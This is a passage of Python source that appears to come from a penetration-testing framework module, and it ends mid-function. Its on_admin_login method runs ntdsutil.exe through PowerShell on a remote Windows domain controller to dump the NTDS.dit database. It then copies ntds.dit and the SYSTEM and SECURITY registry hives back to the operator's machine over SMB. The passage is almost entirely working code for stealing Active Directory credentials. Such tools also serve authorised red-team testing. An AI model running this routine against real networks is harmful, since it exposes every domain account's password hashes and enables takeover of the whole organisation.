| 40 | self.no_delete = True |
| 41 | |
| 42 | def on_admin_login(self, context, connection): |
| 43 | command = f"powershell \"ntdsutil.exe 'ac i ntds' 'ifm' 'create full {self.tmp_dir}{self.dump_location}' q q\"" |
| 44 | context.log.display(f"Dumping ntds with ntdsutil.exe to {self.tmp_dir}{self.dump_location}") |
| 45 | context.log.highlight("Dumping the NTDS, this could take a while so go grab a redbull...") |
| 46 | context.log.debug(f"Executing command {command}") |
| 47 | p = connection.execute(command, True) |
| 48 | context.log.debug(p) |
| 49 | if "success" in p: |
| 50 | context.log.success(f"NTDS.dit dumped to {self.tmp_dir}{self.dump_location}") |
| 51 | else: |
| 52 | context.log.fail("Error while dumping NTDS") |
| 53 | return |
| 54 | |
| 55 | os.makedirs(self.dir_result, exist_ok=True) |
| 56 | os.makedirs(os.path.join(self.dir_result, "Active Directory"), exist_ok=True) |
| 57 | os.makedirs(os.path.join(self.dir_result, "registry"), exist_ok=True) |
| 58 | |
| 59 | context.log.display(f"Copying NTDS dump to {self.dir_result}") |
| 60 | |
| 61 | context.log.debug("Copy ntds.dit to host") |
| 62 | with open(os.path.join(self.dir_result, "Active Directory", "ntds.dit"), "wb+") as dump_file: |
| 63 | try: |
| 64 | connection.conn.getFile( |
| 65 | self.share, |
| 66 | f"{self.tmp_share}{self.dump_location}\\Active Directory\\ntds.dit", |
| 67 | dump_file.write, |
| 68 | ) |
| 69 | context.log.debug("Copied ntds.dit file") |
| 70 | except Exception as e: |
| 71 | context.log.fail(f"Error while get ntds.dit file: {e}") |
| 72 | |
| 73 | context.log.debug("Copy SYSTEM to host") |
| 74 | with open(os.path.join(self.dir_result, "registry", "SYSTEM"), "wb+") as dump_file: |
| 75 | try: |
| 76 | connection.conn.getFile( |
| 77 | self.share, |
| 78 | f"{self.tmp_share}{self.dump_location}\\registry\\SYSTEM", |
| 79 | dump_file.write, |
| 80 | ) |
| 81 | context.log.debug("Copied SYSTEM file") |
| 82 | except Exception as e: |
| 83 | context.log.fail(f"Error while get SYSTEM file: {e}") |
| 84 | |
| 85 | context.log.debug("Copy SECURITY to host") |
| 86 | with open(os.path.join(self.dir_result, "registry", "SECURITY"), "wb+") as dump_file: |
| 87 | try: |
| 88 | connection.conn.getFile( |
| 89 | self.share, |
| 90 | f"{self.tmp_share}{self.dump_location}\\registry\\SECURITY", |
| 91 | dump_file.write, |
| 92 | ) |
| 93 | context.log.debug("Copied SECURITY file") |
| 94 | except Exception as e: |
| 95 | context.log.fail(f"Error while get SECURITY file: {e}") |
| 96 | |
| 97 | context.log.display(f"NTDS dump copied to {self.dir_result}") |
| 98 | |
| 99 | try: |